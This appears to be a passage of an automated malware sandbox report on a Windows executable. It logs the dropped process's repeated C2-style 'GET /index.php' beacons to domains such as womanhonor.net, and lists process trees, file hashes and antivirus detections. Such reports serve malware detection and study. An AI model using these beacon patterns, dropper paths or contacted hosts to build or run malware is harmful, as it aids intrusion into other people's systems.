                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628727913 CEST1236INData Raw: 56 61 72 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 69 73 20 70 61 72 6b 65 64 20 66 6f 72 20 46 52 45 45 20 62 79 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                          Data Ascii: Var"></span></h2> <p> This domain name is parked for FREE by <strong><a href="https://fasthosts.co.uk/" rel="nofollow">fasthosts.co.uk</a></strong> </p> <div class="row"> <div class="card card--is-cta
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628766060 CEST448INData Raw: 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 63 6f 6e 74 61 63 74 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 64 6f 6d 61 69 6e 70 61 72 6b 69 6e 67 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 72 65 66 65 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d
                                                                                                                                                                                                          Data Ascii: fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_contact">Contact us</a> </main> </div> <script> const cleanHostname = document.location.hostname.indexOf("www.") && document.location.hos
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.628777981 CEST187INData Raw: 61 22 29 2e 68 72 65 66 20 3d 20 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 68 6f 73 74 73 2e 63 6f 2e 75 6b 2f 64 6f 6d 61 69 6e 2d 6e 61 6d 65 73 2f 73 65 61 72 63 68 2f 3f 64 6f 6d 61 69 6e 3d 24 7b 63 6c 65 61 6e 48 6f 73 74 6e 61 6d
                                                                                                                                                                                                          Data Ascii: a").href = `https://www.fasthosts.co.uk/domain-names/search/?domain=${cleanHostname}&utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_dac` </script></body></html>
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.633377075 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          server: nginx/1.20.1
                                                                                                                                                                                                          date: Mon, 05 Aug 2024 14:23:18 GMT
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          content-length: 2873
                                                                                                                                                                                                          last-modified: Tue, 16 Jul 2024 11:33:23 GMT
                                                                                                                                                                                                          etag: "66965a83-b39"
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 73 2f 63 73 73 2f 69 6e 64 65 78 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 66 61 73 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel="stylesheet" href="/styles/css/index.css"> <link rel="shortcut icon" href="https://static.fasthosts.co.uk/icons/favicon.ico" type="image/x-icon" /> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-199510482-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-199510482-1'); </script> </head><body> <div class="container"> <nav class="logo"> <a href="https://fasthosts.co.uk/" rel="nofollow"> <img src="/assets/fasthosts-logo-secondary.svg" alt="Fasthosts"></img> </a> </nav> <main> <h2>Welcome to <span class="domain


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          9192.168.2.74971464.190.63.222803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:18.674741983 CEST82OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: watersystem.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:19.359216928 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                          content-length: 93
                                                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          10192.168.2.74971554.244.188.177803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:20.542334080 CEST81OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: womanhonor.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:21.353359938 CEST379INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:21 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=77f125e0628864a7c45e3434bce0ddf3|8.46.123.33|1722867801|1722867801|0|1|0; path=/; domain=.womanhonor.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          11192.168.2.74971681.169.145.88803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:22.892755985 CEST81OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: freshfancy.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:23.542732000 CEST374INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:23 GMT
                                                                                                                                                                                                          Server: Apache/2.4.61 (Unix)
                                                                                                                                                                                                          Content-Length: 196
                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          12192.168.2.74971715.197.192.55803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:25.609951019 CEST84OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: alreadyfriend.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.152344942 CEST254INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:26 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          13192.168.2.749718188.225.40.227803452C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:23:26.948259115 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: followfriend.net
                                                                                                                                                                                                          Aug 5, 2024 16:23:27.646753073 CEST373INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Server: nginx/1.26.1
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:23:27 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 169
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://followfriend.net/index.php
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.7596233.33.130.190807912C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:24:17.780365944 CEST83OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: partygeneral.net
                                                                                                                                                                                                          Aug 5, 2024 16:24:18.320534945 CEST254INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:24:18 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          15192.168.2.75962435.164.78.200807912C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Aug 5, 2024 16:24:48.053297043 CEST84OUTGET /index.php HTTP/1.0
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Host: memberreceive.net
                                                                                                                                                                                                          Aug 5, 2024 16:24:48.786004066 CEST382INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 05 Aug 2024 14:24:48 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=c888f3a3f699a81491e3b3d2c6c0d945|8.46.123.33|1722867888|1722867888|0|1|0; path=/; domain=.memberreceive.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT


                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:10:22:53
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\Users\user\Desktop\mtuXDnH1Di.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\mtuXDnH1Di.exe"
                                                                                                                                                                                                          Imagebase:0xec0000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:10:22:54
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\qbf30bzbv7f7qnhdav.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"
                                                                                                                                                                                                          Imagebase:0x9d0000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 92%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                          Start time:10:22:54
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 92%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                          Start time:10:22:55
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                          Start time:10:22:55
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\amdrhfskpcu.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
                                                                                                                                                                                                          Imagebase:0xa30000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                          • Detection: 92%, ReversingLabs
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                          Start time:10:22:56
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\whfkpbh\idtpqzltyfy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                          Start time:11:45:45
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                          Imagebase:0x7ff7b4ee0000
                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                          Start time:11:46:17
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\idtpqzltyfy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"c:\whfkpbh\idtpqzltyfy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                          Start time:11:46:18
                                                                                                                                                                                                          Start date:05/08/2024
                                                                                                                                                                                                          Path:C:\whfkpbh\amdrhfskpcu.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
                                                                                                                                                                                                          Imagebase:0xcd0000
                                                                                                                                                                                                          File size:279'552 bytes
                                                                                                                                                                                                          MD5 hash:E4B47C06B5EED80FB44CFEA757525634
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:7.4%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:46.6%
                                                                                                                                                                                                            Total number of Nodes:1706
                                                                                                                                                                                                            Total number of Limit Nodes:14
                                                                                                                                                                                                            execution_graph 11364 ec2764 11365 ec2770 Sleep 11364->11365 11367 ec279b 11365->11367 11366 ef08b0 GetSystemTimeAsFileTime 11366->11367 11367->11365 11367->11366 11368 ec27c8 11367->11368 10327 ee66e7 10328 ee679c 10327->10328 10332 ee5706 10328->10332 10334 ecd500 lstrlen 10328->10334 10330 ee86f1 10332->10330 10333 ecd500 lstrlen 10332->10333 10333->10332 10334->10332 10335 ee44e5 10336 ee44f0 10335->10336 10337 ed0920 8 API calls 10336->10337 10338 ee457d 10336->10338 10337->10336 10599 ed1860 10600 ed187d 10599->10600 10602 ed189b SetServiceStatus 10600->10602 10603 ed18cb SetServiceStatus SetEvent 10600->10603 10604 ed18c1 10600->10604 10604->10603 11154 ed4be0 11157 ede140 11154->11157 11158 ede158 11157->11158 11159 ee0b00 8 API calls 11158->11159 11160 ed4c10 11159->11160 11165 ee55e0 11166 ee5643 11165->11166 11169 ee5679 11165->11169 11167 ee56c7 11169->11167 11170 ecd500 lstrlen 11169->11170 11170->11169 10605 ee6a7b 10606 ee6a8c 10605->10606 10607 ee7846 10606->10607 10608 ee77c2 10606->10608 10622 ee5706 10606->10622 10609 ee793b 10607->10609 10610 ee7852 10607->10610 10611 ef5820 wvsprintfA 10608->10611 10613 ee79a8 10609->10613 10615 ee7957 10609->10615 10612 ee78c5 10610->10612 10614 ee786e 10610->10614 10611->10622 10617 ef5820 wvsprintfA 10612->10617 10616 ef5820 wvsprintfA 10613->10616 10618 ef5820 wvsprintfA 10614->10618 10614->10622 10619 ef5820 wvsprintfA 10615->10619 10615->10622 10616->10622 10617->10622 10618->10622 10619->10622 10620 ee86f1 10622->10620 10623 ecd500 lstrlen 10622->10623 10623->10622 10624 ed3874 10633 ed3880 10624->10633 10625 ee3a80 4 API calls 10625->10633 10626 ed4009 10627 ed403e 10626->10627 10628 ed404a 10626->10628 10631 ec1170 2 API calls 10627->10631 10632 ec1170 2 API calls 10628->10632 10629 ed2c90 4 API calls 10629->10633 10630 ec1170 2 API calls 10635 ed3959 10630->10635 10634 ed4045 10631->10634 10632->10634 10633->10625 10633->10629 10633->10635 10635->10626 10635->10630 11171 ed6ff0 11172 ed700d 11171->11172 11181 ecd500 lstrlen 11172->11181 11174 ed7083 11175 ed0110 8 API calls 11174->11175 11176 ed7099 11175->11176 11177 ec1ca0 9 API calls 11176->11177 11178 ed70ac 11177->11178 11179 ee3080 8 API calls 11178->11179 11180 ed70d0 11179->11180 11181->11174 11190 eca5c0 11191 edd990 8 API calls 11190->11191 11192 eca600 11191->11192 11197 ec2b40 11192->11197 11194 edd990 8 API calls 11196 eca6ac 11194->11196 11195 eca61d 11195->11194 11198 ec2b51 11197->11198 11199 ee4420 8 API calls 11198->11199 11200 ec2b61 11199->11200 11200->11195 10343 eda6c0 10344 eda6d7 10343->10344 10345 ee4450 12 API calls 10344->10345 10346 eda71c 10345->10346 10347 ed4290 8 API calls 10346->10347 10348 eda7ea 10347->10348 10644 edca40 10645 edca62 10644->10645 10700 ee49b0 10645->10700 10647 edcb32 10648 ee4af0 4 API calls 10647->10648 10650 edd03e 10647->10650 10649 edcc06 10648->10649 10651 ec2f90 2 API calls 10649->10651 10652 edcc2c 10651->10652 10653 ecd530 9 API calls 10652->10653 10654 edcc44 10653->10654 10655 ed1bb0 2 API calls 10654->10655 10656 edcc6b 10655->10656 10704 ec2f00 10656->10704 10661 ef1050 8 API calls 10662 edcccb 10661->10662 10663 ec2f90 2 API calls 10662->10663 10664 edccf4 10663->10664 10665 ef01a0 9 API calls 10664->10665 10666 edcd19 10665->10666 10667 ef1050 8 API calls 10666->10667 10668 edcd25 10667->10668 10669 ed1bb0 2 API calls 10668->10669 10670 edcd47 10669->10670 10671 edc770 8 API calls 10670->10671 10672 edcd7b 10671->10672 10673 ef1050 8 API calls 10672->10673 10674 edcd84 10673->10674 10710 eeb500 10674->10710 10676 edcdb4 10714 ece550 10676->10714 10678 edcde5 10679 ed97b0 9 API calls 10678->10679 10680 edce25 10679->10680 10772 edbf40 10680->10772 10683 ec2f90 2 API calls 10684 edce9c 10683->10684 10685 ef01a0 9 API calls 10684->10685 10686 edcec2 10685->10686 10687 ef1050 8 API calls 10686->10687 10688 edcece 10687->10688 10689 ed1bb0 2 API calls 10688->10689 10690 edcf08 10689->10690 10691 